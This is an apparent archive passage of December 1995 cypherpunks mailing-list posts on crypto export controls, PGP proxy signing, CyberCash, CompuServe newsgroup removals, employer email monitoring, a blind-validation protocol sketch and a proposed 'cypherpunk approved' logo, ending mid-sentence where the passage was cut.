<199512271817.KAA16898@netcom14.netcom.com> From: softwa19 at us.net (Charles R. Smith) Newsgroups: talk.politics.crypto Date: Tue, 26 Dec 1995 16:55:09 GMT RSA CEO/President D. James Bidzos, in a speech before the Commonwealth Club of California, openly stated his opposition to current USML/ITAR controls. "We stand to lose a significant part of our industry due to export controls", said Bidzos in the taped address shown on C-Span 12/25/95. The recent teaming of Sun with ex-Soviet programmers to avoid U.S. export controls on encryption was cited by Bidzos as an example of exactly how jobs and opportunities are being forced off shore by U.S. policy. Bidzos statements echo the remarks from Microsoft CEO, Bill Gates, who also lashed out at federal export restrictions in his comments before the National Press Club in early Decemeber. This author noted some months ago the teaming of Ernst & Young and SOFTWARE (AG), a german based software firm, to provide encryption security with no import regulations. Foreign companies are allowed freely to compete in the U.S. domestic market while U.S. citizens are restricted from the international market. This imbalance costs american jobs, taxes, rapidly erodes our lead in this important area of science and is unfair. The regulations, instead of limiting access to foriegn criminals and terrorists, has led to a U.S. funded explosion of better off-shore products that are beyond law enforcement control. In fact, the Federal government not only encourages this effort but even has a multi-million dollar contract with SOFTWARE (AG). The time for these regulations has clearly passed. Yet, our government is not geared for quick action, nor will self-seeking bureaucrats ever be convinced to let go. The world, however, will quickly leave us behind unless we act soon. 1 if by land, 2 if by sea. Paul Revere - encryption 1775 Charles R. Smith - President SOFTWAR, Richmond VA http://www.ultimate.org/2292/ From perry at piermont.com Thu Dec 28 13:55:57 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 29 Dec 1995 05:55:57 +0800 Subject: Proxy/Representation? In-Reply-To: <199512281517.JAA13397@cdale1.midwest.net> Message-ID: <199512281546.KAA09482@jekyll.piermont.com> "David E. Smith" writes: > The question is: how do the current software packages handle representatives > and proxies for a given is-a-person? Using PGP as an example, I can't sign > a message with Helen's key. Nor should you be able to, actually. When you sign a document on behalf of another and have "Power of Attorney" in the paper world, you sign your own name and indicate that you are signing on behalf of another, as in "David Smith for Helen Smith". The right way to do this in the digital world, IMHO, is to have a standard for "Power of Attorney" documents, and for the entity receiving something signed in your key that should be signed in another person's key to also see the digitally signed power of attorney document. Then the entity can check the signature on the power of attorney was in Helen's key, and that the signed key in that document was the key that signed the document signed by the "attorney". > I'm sure that this has already popped up, so I'll just ask for pointers. Actually, I haven't seen it mentioned before -- its only a subset of other problems, though, like transient keys signed by longer term keys. There should be some standardization in formats to handle this. Perry From adam at lighthouse.homeport.org Thu Dec 28 14:45:02 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Fri, 29 Dec 1995 06:45:02 +0800 Subject: URL for cypherpunks In-Reply-To: Message-ID: <199512281556.KAA05580@homeport.org> Norman Hardy wrote: | I am putting up some solutions to the Garage Door problem that was | discussed here perhaps a year ago. I would like to refer to the cypherpunks | by URL. Are there currently any appropriate URLs ? Possibly the archive site at www.hks.net. Tim May's cypheromnicon. mailto:cypherpunks at toad.com is NOT an appropriate pointer. People who hand out pointers to mailing lists (other than the subscribe address) are annoying fools, and encourage many innocent fools to annoy many people. The csua.cs.bezerkely site is good, but hasn't been maintained in a while. (Unfortunately, there is enough cypherpunk & related stuff out there that maintaining a really good site would be a full time job. Thats not a flame at any of the people out there who do good work, just a wish for a really well organized www.cypherpunks.org library & pointer list, should someone decide to pay for it. :) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From adam at lighthouse.homeport.org Thu Dec 28 15:13:58 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Fri, 29 Dec 1995 07:13:58 +0800 Subject: Cybercash security In-Reply-To: Message-ID: <199512281557.KAA05598@homeport.org> Donald E. Eastlake 3rd wrote: | The current plans include a way to link your CyberCash persona with | a bank account (DDA). If you have done that and there is cash in | your CyberCash persona, you would be able to transfer it to the bank | account. Using ACH, this operation typically happens overnight. Wow. Overnight clearing, bank interaction to load an account, *and* identity linking! Tell me again why this is better than FV? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From dee at cybercash.com Thu Dec 28 16:44:05 1995 From: dee at cybercash.com (Donald E. Eastlake 3rd) Date: Fri, 29 Dec 1995 08:44:05 +0800 Subject: Cybercash security In-Reply-To: <199512281557.KAA05598@homeport.org> Message-ID: On Thu, 28 Dec 1995, Adam Shostack wrote: > Donald E. Eastlake 3rd wrote: > > [in answer to a question about how you would unload cash from a > Cybercash persona] > > | The current plans include a way to link your CyberCash persona with > | a bank account (DDA). If you have done that and there is cash in > | your CyberCash persona, you would be able to transfer it to the bank > | account. Using ACH, this operation typically happens overnight. > > Wow. Overnight clearing, bank interaction to load an account, > *and* identity linking! Tell me again why this is better than FV? You comment is sufficiently short and cryptic that it's a bit hard to tell what your point is. Different services are good for different things. Most of the merchant's signed up with CyberCash currently sell hard goods that they phsically ship to you. They have different needs from the on-line information vendors that FV primarily serves at this time. But both CyberCash and, I understand, FV plan to expand their service repertoire. If you want to use your credit card or bank account via CyberCash, you need to go though an authentication step to link them. If you don't want to use a credit card or bank account, there is no requirement to provide any real identity information when you set up a CyberCash persona. > Adam > > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume Donald ===================================================================== Donald E. Eastlake 3rd +1 508-287-4877(tel) dee at cybercash.com 318 Acton Street +1 508-371-7148(fax) dee at world.std.com Carlisle, MA 01741 USA +1 703-620-4200(main office, Reston, VA) From markm at voicenet.com Thu Dec 28 17:07:11 1995 From: markm at voicenet.com (Mark M.) Date: Fri, 29 Dec 1995 09:07:11 +0800 Subject: URL for cypherpunks In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 27 Dec 1995, Norman Hardy wrote: > I am putting up some solutions to the Garage Door problem that was > discussed here perhaps a year ago. I would like to refer to the cypherpunks > by URL. Are there currently any appropriate URLs ? The most appropriate URL would be http://www.csua.berkeley.edu/cypherpunks/. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMOLX0LZc+sv5siulAQH/pgP/bDZ1cy0YjaQeuusUwoAkikJhdKtjW8r5 eoJzRcGaaPd1wdOuVP3w4ab5D2+LMj/B765GumHV9okT/01yHVcratqVymDxkG05 TuE7RSpicusKfa/V0cpb6uZjqjbP8DPj9nEX5CU3YFMHzmFCGlRNjsYj6n4odpqW XBQF/i1AHoU= =UEJR -----END PGP SIGNATURE----- finger -l markm at omni.voicenet.com for PGP key Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5 http://www.voicenet.com/~markm/ -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+ b+++ DI+ D++ G+++ e! h* r! y? ------END GEEK CODE BLOCK------ From C.deGroot at inter.nl.net Thu Dec 28 17:44:38 1995 From: C.deGroot at inter.nl.net (Cees de Groot) Date: Fri, 29 Dec 1995 09:44:38 +0800 Subject: FYI - telecom bill or not there are still censors In-Reply-To: <2.2.32.19951227172007.0070f34c@mail.software.net> Message-ID: <199512281652.RAA05245@bofh.cdg.openlink.co.uk> > > According to reports popping up in other places around the Compuserve > Information Service it appears that they have taken a stance of Internet > censor and are now blocking access to certain Usenet newsgroups. This > move took place just before the Christmas holiday and remains unannounced > to the membership/subscriber base. > I got this response so fast, that I cannot do anything else but assume that they got an automated reply thingy on such requests. For any other simple question, CI$ needs something like a week to reply... :To: :Subject: Usenet Newsgroups : :Re: USENET Newsgroups : : :Thank you for using CompuServe Feedback! This is in reference :to your message concerning the disappearance of certain newsgroups :on CompuServe. : :Access to these certain newsgroups have been suspended indefinitely. :CompuServe has been notified that these areas may be in :violation of applicable laws or regulations. This matter is :under further review. : :Please let us know if you have any further questions. Thank you for :using CompuServe Feedback! : :Charlotte Harris : I won't start to comment on the style of this message. The term "Suitspeak" comes to mind. -- Cees de Groot, OpenLink Software 262ui/2048: ID=4F018825 FP=5653C0DDECE4359D FFDDB8F7A7970789 [Key on servers] -- Any opinions expressed above might be mine. From tcmay at got.net Thu Dec 28 18:22:32 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 29 Dec 1995 10:22:32 +0800 Subject: Laws, Politics, and Crypto Anarchy Message-ID: (Those interested in discussions of Fermat numbers should skip this message.) At 2:33 PM 12/28/95, David Mandl wrote: >I have very strong feelings about this subject, but I'll keep them to >myself for now since I'm posting from work. We were all informed a >week or two ago that Bear Stearns is now archiving every piece of >email coming into or leaving the company. > >All I'll say here is that I disagree strongly with the views Tim May >posted about employees' property rights, etc. (though we agree on most >other things). Yes, Dave and I agree about many things, but disagree about some things. I would not like to have my e-mail into and out of Bear Stearns--were I an employee--archived, monitored, and so forth, but I can certainly see why they feel the need to do it (their liability for SEC violations, insider trading, etc. is enormous). And were I an employer, I would not want some government telling me I am forbidden to see if my employees are selling me out over the Net. Just an example. (Important Historical Note: The thing that got me interested in cryptography, beyond my longstanding interest in the elegant mathematics of public key cryptography, was an evaluation I did in 1987 of an "information trading" business startup. My friend Phil Salin asked me to review his business plan for a company which later became "American Information Exchange" (AMIX). It allowed for people with information to sell to reach the potential buyers, and for buyers to reach potential sellers. Like a classified ad system. I thought about the system and said: "As an employer, I could not let my employees use your system." Phil's reaction was "Huh?" So I outlined a scheme whereby employees could begin "digital moonlighting," not only selling their expertise to my competitors on _company time_, but, infinitely worse, selling specific trade secrets to my competitors! I cited to Phil the prospect of a "BlackNet" (yes, I named it that in '87) which bought and sold corporate (and military, as I elaborated on the concept) secrets through digital pseudonyms and Chaum-style mixes. It became apparent to me what the Brave New World was going to look like. And thus were the ur-cypherpunkish ideas born.) It was not my intention to begin a debate about the nature of civil liberties and the role of property. In fact, I don't think "libertarian" debates are very useful here, for various reasons. (Though I don't go as far as some in thinking that only pure crypto should be discussed....the mix of crypto, programming, personal privacy, and technological empowerment is what we talk about.) Moreover, if political and economic issues never get discussed at all, some folks may think that Cypherpunks are "obviously" supportive of things like Data Protection Laws (which place limits on the compilation of dossiers and files on people), Electronic Privacy Laws (which tell employers they cannot snoop on employees), and Web Index Laws (which may limit the archiving and indexing of Usenet and Web items). In fact, I am against all of these laws. However, I won't take the list's time now to explain why, as the political discussion would take too long. Past articles have touched on these points, and references are scattered throughout the Cyphernomicon. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From lull at acm.org Thu Dec 28 18:41:50 1995 From: lull at acm.org (John Lull) Date: Fri, 29 Dec 1995 10:41:50 +0800 Subject: Proxy/Representation? In-Reply-To: <199512281517.JAA13397@cdale1.midwest.net> Message-ID: <30e2ce46.37070124@smtp.ix.netcom.com> David E. Smith wrote: > The question is: how do the current software packages handle representatives > and proxies for a given is-a-person? Using PGP as an example, I can't sign > a message with Helen's key. And a message signed with my key won't hold > as much weight because "Dave" is not "Helen." And if every message I send > on behalf of Helen has to be followed up by a message from Helen stating > "yes, Dave may act on my behalf for this instance" then much of the point > of the proxy process is lost. (i.e. the reduction of Helen's workload etc.) I would think a power-of-attorney, signed by Helen, would do the trick. This would normally be valid for some pre-defined period, for a pre-defined set of transactions, and would not have to be generated anew each time. From tcmay at got.net Thu Dec 28 20:59:15 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 29 Dec 1995 12:59:15 +0800 Subject: Compuserve is Not "Censoring": Look to Governments for the Cause Message-ID: At 4:52 PM 12/28/95, Cees de Groot wrote, speaking of Compuserve's recent dropping of many newsgroups in response to demands by German prosecutors: >I won't start to comment on the style of this message. The term "Suitspeak" >comes to mind. Perhaps it is "Suitspeak," but it is not "censorship." Or, more precisely, it is fear that government laws will be used to sanction the service. Thus, it is the government of Germany in this case which is "censoring." ("Censor" and "censorship" are notoriously overloaded terms, of course.) Likewise, the Telecom/Exon Bill which we are so opposed to would just make the U.S. another player in this arena, joining Germany, Iraq, Syria, Singapore, and other regimes in attempting to regulate what people access on the Net. The U.S. would most like demand that a foreign-based service operating in the U.S. comply with U.S. laws. The problem lies with the laws themselves, as there is essentially no solution which will accommodate all of the various conflicting standards and mores of the world's nations and tribes while still having a Net such as we know it today. This is why I favor "technological anarchy": have systems which allow people to read and write what they want to read and write, not what church elders or government officials have deemed to be approprate or wholesome. (Note: There are ongoing debates about whether laws against obscenity, pornography, insulting speech, and on and on, violate free speech provisions in the U.S. Constitution. I won't get into this here. However, the laws of Germany, Iraq, North Korea, Singapore, France, Syria,......, Germany, Japan, Italy, and Zaire are definitely not those of the U.S. Thus, any _global_ service, such as Compuserve, may soon be forced to remove 70% or more of all Usenet newsgroups, and to restrict Web page access. After all, providing access to "alt.binaries.pictures.muslim.women.nude" is punishable by death by stoning in at least 30 countries. And providing access to Christian recruiting groups, and most Jewish groups, is definitely not allowed in the Kingdom of Saudi Arabia--better remove all those groups.) More than just Compuserve and AOL--which has a list of words it does not like to see used--I expect the various attempts to crack down on un-Christian, un-Muslim, un-chastity, etc. words and images to spread. Singapore will have its list of things it doesn't want its "children" (= all citizen-units) to see, Nigeria will have its list, and so on. Germany's longstanding moves to limit images and words it considers inappropriate and offensive are likely to force many Usenet newsgroups out of Germany. Law enforcement there is concentrating on Compuserve, and is trying to get U.S. officials to crack down on neo-Nazi Web sites in the U.S. The shape of things to come. Technology to bypass these new laws, not even more laws, is the key. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From alex at proust.suba.com Thu Dec 28 21:00:08 1995 From: alex at proust.suba.com (Alex Strasheim) Date: Fri, 29 Dec 1995 13:00:08 +0800 Subject: blind validation Message-ID: <199512281849.MAA08259@proust.suba.com> With all the recent Congressional activity, I've been thinking about blind validation. I know that other people (Chaum, for one) have considered it, but it's not something that's talked about online very often. I'd like to kick off a discussion. I'm not good with protocols, there are almost certainly some flaws in my thinking, and I'm not familiar with much of what others have written on the subject. Any pointers or constructive criticism will be greatly appreciated. I Basicd (Almost everyone here will be familar with this stuff; I'm including it for completeness.) By "blind validation", I mean allowing someone to prove that they're entitled to do something without making them tell you who they are. One obvious application of blind validation is to allow people to download adult material anonymously while making sure that children don't have access. Other applications might be allowing US citizens to download crypto software anonymously, or giving members of a University community anonymous access to computing resources that aren't available to the general public. Why is blind validation desireable? Without blind validation, it's possible to build large and intrusive databases by linking together the various fields on your ID cards, especially your social security number. When someone goes to a liquor store and shows an ID, he doesn't just prove he's over 21. He tells the clerk his name and address, and whether or not he wears glasses, among other things. This isn't a big problem when you're showing your ID to a clerk, because the clerk is a human being who won't remember your name or address. But a computer has a very good memory, and groups of computers are very good at assembling data from disparate sources. There are already online services that do this. Westdata, for example, offers a service that allows customers to search a database assembled from a variety of sources -- census information, real estate transactions, credit information, telephone directories, and the like. It's pretty easy to go online and find someone's SSN, and once you've got that it's possible to retreive all sorts of information. This is why it's sensible for us to give out as little information as is ncessary to accomplish whatever it is we're trying to do. That's what blind validation is all about. II Transferability -- blind validation's big problem. Suppose Alice is allowed to do something. How can we prevent her from giving Carol the right to do it as well? We can't. This is true of any (ok, I don't know that -- most) validation scheme, not just blind scehems. I can give away a unix account's login name and password, or even my PGP key. But conventional validation schemes have a big advantage over blind ones: in non-blind validation, users can be held accountable for the people they let in. If I give someone access to my unix account and they post photoshop disk images to usenet, I'll be held responsible. I have a strong incentive to keep my password secret. If I can get blind validation to do something, I can't be held accountable for my own actions, or for giving access to someone else. This fact drastically reduces the number of situations in which blind validation is useful. Here's a simple blind validation protocol that won't work: 1. Alice generates a random number, blinds it, and sends it to Trent along with proof that she's validateable. 2. Trent checks Alice's proof of validatability, signs her blinded number, then returns it to her. 3. Alice unblinds her number and sends it to Bob, along with a request for a download. Then Alice uses a remailer to post her number to usenet, along with Trent's signature, and Bob has to let everyone who reads net news download files. Even a ticket based protocol similar to ecash won't work. Let's assume that Bob wants a ticket in exchange for a file, and that he checks the tickets people give him for double spending. What's to stop Alice for getting a thousand tickets from Trent and giving them to her friends? Tickets aren't ecash -- they don't cost anything. Trent will give a ticket to anyone who can prove he's validatable, and there's nothing preventing Alice from going back for tickets over and over again. III Kids and Liquor Stores Imagine a group of teenagers who want to buy some booze. Let's consider two attacks they can mount on a liquor store: they can go in and try to trick the clerk into selling to them, or they can hang around in the parking lot and try to convince an adult to buy for them. The liquor store wants to keep its license, so it tries hard to defend against the first attack. But there's nothing they can do about the second attack, and what's more, they really don't have to worry about it. If they give booze to minors, they can lose their license or possibly even face criminal charges. But if some other adult gives booze to the minors, he's responsible. It's not the liquor store's problem. If the kids get their booze from the clerk or another customer, the end result is the same: the kids are able to get drunk. But from the store's point of view, there's a big difference, the difference between losing their license and keeping it. This is very different from the attitudes of the participants in most crypto protocols. If I use a protocol to exchange secure email, I don't want anyone except the recipient to read it. It's not much comfort for me to be able to say, "It's not my fault," if the mail becomes public. But the liquor store has to be able to live with the possibility that a kid will get ahold of some booze from their shelves. If that's absolutely unacceptable to them, the only thing they can do is close their doors or make patrons drink up in front of the clerk, because they can't prevent a customer from giving a bottle to a minor. The main interest of the liquor store is to avoid blame for underage drinking, not to make absolutely sure that kids can't drink. IV Alice, Bob, and Sam. Let's assume that Bob is running an FTP archive with crypto software, and Alice wants to download it. Alice wants to remain anonymous. Let's assume that a blind validation scheme, where Alice proves that she's a US citizen while remaining anonymous, is acceptable to both of them. If a blind validation scheme is acceptable, why isn't no validation at all? Obviously Alice ought to be satisfied with no validation. She wants the file, and she wants to remain anonymous. If Bob doesn't use any validation, Alice is still happy. But what about Bob? Bob's not an idiot. He knows that if he distributes crypto software on the net, someone's going to send a copy to Europe, and if he uses blind validation he won't be able to find out who did it. Consequently, if the software's appearance in Europe is totally unacceptable to Bob, he won't distribute it with blind validation. If Bob can live with the software appearing in Europe, why does he want to use blind validation to check for citizenship? The answer, obviously, is that Sam (as in Uncle, the government) has told Bob he'll be imprisoned if he exports the software. The blind validation scheme will let Bob distribute the software anonymously (which is what he wants to do) and prove to Sam that he's followed the letter of the law. In general, it doesn't seem that there are many situations that only involve Alice and Bob where blind validation makes sense. If Bob is willing to accept the increased risk of transferability that comes with blind validation, he'll probably be willing to accept no validation at all. Blind validation becomes useful primarily when you add Sam to the mix. This isn't an absolute truism of course. Let's think about a library card catalog at a University. I remember a conversation I once had with an INS investigator, in which he told me that he sometimes asked for a list of all the books his targets had taken from the public library. You can learn a lot about someone from what they read, or even from their card catalog searches. I know that some universities restrict access to their card catalogs to students, faculty, and staff. Why? Because they don't want to shoulder the cost of providing a research tool to the entire net. They're not trying to protect the information -- they're trying to reduce load on their library computer. Perhaps a University might recognize that there there's some value in using a blind authentication system to grant access to the catalog. It could protect the privacy of the people using the catalog, and still do a reasonably good job of keeping out people who shouldn't be involved. The role of Sam in this discussion might be one of the reasons that blind validations haven't generated much interest on the net in general or on the cypherpunk list specifically. If blind validation is privarily useful for cooperating with laws we don't agree with, then it's not unreasonable to look at it as a technology of collaboration. A viable blind validation scheme might make censorship more attractive. V A protocol Let's assume that Alice knows that Bob and Trent are who they claim to be, and that she can talk to Bob anonymously, perhaps through a chain of remailers or a dc net. This protocol isn't intended to protect Bob's privacy, only Alice's. We also assume that there's some sort of system in place for non- blind validations. 1. Alice initiates a transaction with Bob. (Perhaps by asking him for a file.) 2. Bob generates a random number and sends it back to Alice. 3. Alice blinds Bob's number and sends it to Trent, along with proof of her validatability. 4. Trent checks Alice's proof, signs the blinded number, and then returns it to Alice. 5. Alice unblinds Bob's number, then sends it to Bob. 6. Bob checks Trent's signature and makes sure that the number he recieved matches the one he sent out. Then Bob processes Alice's transaction. If Bob always follows this protocol, he can prove to Sam that he's followed the law. Alice remains anonymous. Alice can still transfer the file, but she has to give it away herself: she can't give away the ability to get it directly from Bob without giving away the ability to prove Aliceness to Trent. This means that she'd have to accept all the consequences of giving away non-blind validatability. The main problems that I can see with this protocol are: 1. It's vulernable to traffic analysis. 2. Sam has to trust Trent, which he may be unwilling to do. 3. You can infer stuff about Alice from the kinds of requests she makes of Trent. Someone who always asks Trent for proof that he's not a felon might tag himself as a person who buys a lot of guns or ammunition, for example. I'd like to put Trent out of a job, but it's hard to imagine a Trentless system without Chaum's observer chips. I've read Hal's criticisms of observer chips, and what he says makes sense to me. But observer chips could be more appropriate in a blind validation situation than they are with ecash. Ecash security has to be bullet proof, but if we can live with transferability in a blind validation system we've already given up on such rigorous security. From m5 at dev.tivoli.com Thu Dec 28 21:21:45 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Fri, 29 Dec 1995 13:21:45 +0800 Subject: Employer Probing Precedents? In-Reply-To: Message-ID: <9512282259.AA12970@alpha> Scott Brickner writes: > The notion that, simply because you're wearing a uniform owned by your > employer, you're subject to physical search at the employer's > discretion is laughable. The difference between this and searching the > computer on one's desk differ only in degree, IMO. Another vaguely-related concept is that of tenants' rights to a degree of security in rental property. My employer owns the workstation in front of me, but in exchange for supplying them with software and ideas (when I'm not busy sending e-mail to mailing lists ;-) they've "given" it to me to use in that pursuit. They could of course insist that I pay for it, like the old company store model that railroad workers dealt with. In a sense I do pay for it, under the idea that the company would be able to pay me more if not for the expense of the tools I need for the job. Though the ownership==control equation works sometimes, and is appealing to reason, I don't think things are always so simple. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From corey at netscape.com Thu Dec 28 22:03:55 1995 From: corey at netscape.com (Corey Bridges) Date: Fri, 29 Dec 1995 14:03:55 +0800 Subject: cool cpunk project proposal: "cpunk approved" logo Message-ID: <199512282150.NAA10375@urchin.netscape.com> >now, I don't know if people here realize how much great potential this >idea has. the media just LOVES to quote these kinds of judgements when >it's a slow news day (witness Blackwell's "worst dressed" list or >"best haircuts" or whatever else). Well...nothing personal, but I'd rather cut my n*ts off than be the blackwell of the information industry... >:-) And not to poo-poo a nifty idea, but ultimately, I think that any c'punk cooperative effort like that is doomed to failure. Sure, people can manage to get together every month or so for a cypherpunk meeting (well, *I* can't, but I'm even more disorganized than most), but beyond that, things like official c'punk press releases, and official c'punk FAQs, and official c'punk seals of approval are just NOT going to happen and still be called Officially Cypherpunk. It's tough to have an "official" anything for a group that's not REALLY a group--just the name of a mailing list. Now, this doesn't stop Tim from creating his Cyphernomicon, and it doesn't stop other people on this list from issuing their own press releases. Nor should it stop you (and other interested parties) from issuing your seal of approval to worthy products. I just don't think it'll work to call it the Official Cypherpunk S-O-A. Besides, the idea of having an official seal-of-approval sticker sounds like we're only one step away from having Cypherpunk action figures. ("New Eric Hughes figure with crushing logic grip! Detweiler with whirling Tentacles of Doom (tm)!") Uh, I guess I should have put "NOISE" in the subject line... Corey Bridges Security Documentation Netscape Communications Corporation home.netscape.com/people/corey 415-528-2978 From dsmith at midwest.net Thu Dec 28 22:44:33 1995 From: dsmith at midwest.net (David E. Smith) Date: Fri, 29 Dec 1995 14:44:33 +0800 Subject: Proxy/Representation? Message-ID: <199512290017.SAA00619@cdale1.midwest.net> At 10:46 AM 12/28/95 -0500, perry at piermont.com wrote: >"David E. Smith" writes: >> The question is: how do the current software packages handle representatives >> and proxies for a given is-a-person? Using PGP as an example, I can't sign >> a message with Helen's key. >Nor should you be able to, actually. And I can't :) >The right way to do this in the digital world, IMHO, is to have a >standard for "Power of Attorney" documents, and for the entity >receiving something signed in your key that should be signed in >another person's key to also see the digitally signed power of >attorney document. Then the entity can check the signature on the >power of attorney was in Helen's key, and that the signed key in that >document was the key that signed the document signed by the "attorney". That's more of what I was looking for. I suppose that (I'm still using PGP as my example) there could be a shared PGP key, signed by Helen and myself, where only the two of us know the passphrase, with a keyid of "David Smith on behalf of Helen Jones " or something similar. The obvious problem is that in sharing the pass phrase the security is weakened. (Paranoid threat model: at some point we have to decide on the pass phrase, and we are videotaped/bugged/spied upon while this takes place.) dave ----- David E. Smith, c/o Southeast Missouri State University 1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814 PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/ Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864 From usura at utopia.hacktic.nl Thu Dec 28 22:45:33 1995 From: usura at utopia.hacktic.nl (Alex de Joode) Date: Fri, 29 Dec 1995 14:45:33 +0800 Subject: [reply to anonymous] Re: rsaref Message-ID: <199512282306.AAA28036@utopia.hacktic.nl> to whom it may concern: rsaref20 is available on ftp.hacktic.nl since may 1995 in /pub/replay/pub/crypto/LIBS/rsaref20.zip -AJ- From perry at piermont.com Thu Dec 28 22:55:23 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 29 Dec 1995 14:55:23 +0800 Subject: Proxy/Representation? In-Reply-To: <199512290017.SAA00619@cdale1.midwest.net> Message-ID: <199512290024.TAA10333@jekyll.piermont.com> "David E. Smith" writes: > >The right way to do this in the digital world, IMHO, is to have a > >standard for "Power of Attorney" documents, and for the entity > >receiving something signed in your key that should be signed in > >another person's key to also see the digitally signed power of > >attorney document. Then the entity can check the signature on the > >power of attorney was in Helen's key, and that the signed key in that > >document was the key that signed the document signed by the "attorney". > That's more of what I was looking for. I suppose that (I'm still using > PGP as my example) there could be a shared PGP key, signed by Helen and > myself, where only the two of us know the passphrase, Huh? Why? Why would you need such a thing? If you reread what I wrote above, you would see that such a thing is completely unneeded. Perry From stewarts at ix.netcom.com Thu Dec 28 23:01:31 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 29 Dec 1995 15:01:31 +0800 Subject: [reply to anonymous] Re: rsaref Message-ID: <199512290035.QAA09284@ix13.ix.netcom.com> At 12:06 AM 12/29/95 +0100, Alex de Joode wrote: >to whom it may concern: > >rsaref20 is available on ftp.hacktic.nl since may 1995 in > > /pub/replay/pub/crypto/LIBS/rsaref20.zip If the RSA folks want to get picky, this may be violating their copyright, which is enforceable in Europe (unlike their patents.) There's also an RSAEURO clone of RSAREF which is available on ftp.ox.ac.uk/pub/crypto, and presumably at many other fine sites. #-- # Thanks; Bill # Bill Stewart, stewarts at ix.netcom.com, Pager/Voicemail 1-408-787-1281 # # "The price of liberty is eternal vigilance" used to mean us watching # the government, not the other way around.... From ecarp at tssun5.dsccc.com Thu Dec 28 23:08:39 1995 From: ecarp at tssun5.dsccc.com (ecarp at tssun5.dsccc.com) Date: Fri, 29 Dec 1995 15:08:39 +0800 Subject: Employer Probing Precedents? Message-ID: <9512272350.AA27768@tssun5.> > From owner-cypherpunks at toad.com Wed Dec 27 17:48 CST 1995 > Date: Wed, 27 Dec 1995 16:51:41 -0500 > Subject: Employer Probing Precedents? > To: cypherpunks at toad.com > From: "Jason D. Livingood/WSC"@hks.net > X-Server-Version: Cactus-Serv 1.5 > > -----BEGIN PGP SIGNED MESSAGE----- > > To Whom It May Concern: > > I was curious as to where I might find some electronic freedom legal > precedents. If, for example, an employer was planning to probe file systems on > PCs in the off-hours and employees began encrypting their hard drives, what > legal precedents would support the employees or would support the employer in > blocking the encryption? Try www.eff.org. I have a partition on my HD that is routinely encrypted. When asked about it, my response was that I was acting to protect company confidential material and company assets. From vznuri at netcom.com Thu Dec 28 23:35:59 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Fri, 29 Dec 1995 15:35:59 +0800 Subject: cool cpunk project proposal: "cpunk approved" logo In-Reply-To: <199512282150.NAA10375@urchin.netscape.com> Message-ID: <199512290136.RAA05099@netcom17.netcom.com> > >And not to poo-poo a nifty idea, but ultimately, I think that any c'punk >cooperative effort like that is doomed to failure. Sure, people can manage >to get together every month or so for a cypherpunk meeting (well, *I* can't, >but I'm even more disorganized than most), but beyond that, things like >official c'punk press releases, and official c'punk FAQs, and official >c'punk seals of approval are just NOT going to happen and still be called >Officially Cypherpunk. It's tough to have an "official" anything for a group >that's not REALLY a group--just the name of a mailing list. you totally misunderstand my message. this is NOT an "official" project, it is NOT a cooperative project. I am proposing that INDIVIDUALS undertake the project under the cypherpunk name. no one has a right to complain after all, when there is no *official* cypherpunk standard. really, I do LOVE anarchy. >Now, this doesn't stop Tim from creating his Cyphernomicon, and it doesn't >stop other people on this list from issuing their own press releases. Nor >should it stop you (and other interested parties) from issuing your seal of >approval to worthy products. I just don't think it'll work to call it the >Official Cypherpunk S-O-A. I did not call it that. and in fact I of all people understand cypherpunk psychology quite well, thank you very much. > >Besides, the idea of having an official seal-of-approval sticker sounds like >we're only one step away from having Cypherpunk action figures. ("New Eric >Hughes figure with crushing logic grip! Detweiler with whirling Tentacles of >Doom (tm)!") not a bad idea imho. but really, someone came up with a Big Brother Inside sticker without a lot of whining about "officialness". all I am proposing is exactly the same thing, except that it would have the word "cypherpunk" on it. what's the difference? absolutely none. no one has any right to complain how the cypherpunk name is used if there is no "official" cypherpunk management. but notice I was excessively careful never to imply there was anything OFFICIAL the project. there is to be no collaboration or coordination except that agreed to by participants. what could be simpler??? it's really ridiculous how much the word OFFICIAL is considered pornographic on this mailing list. I didn't use that word and went to great lengths not to (and do so in ALL my mail to this list knowing the hypersensitivity of its participants). what I do object to is that because there is no OFFICIAL cypherpunk standard that individuals cannot create one that they CALL official. there is NOTHING stopping 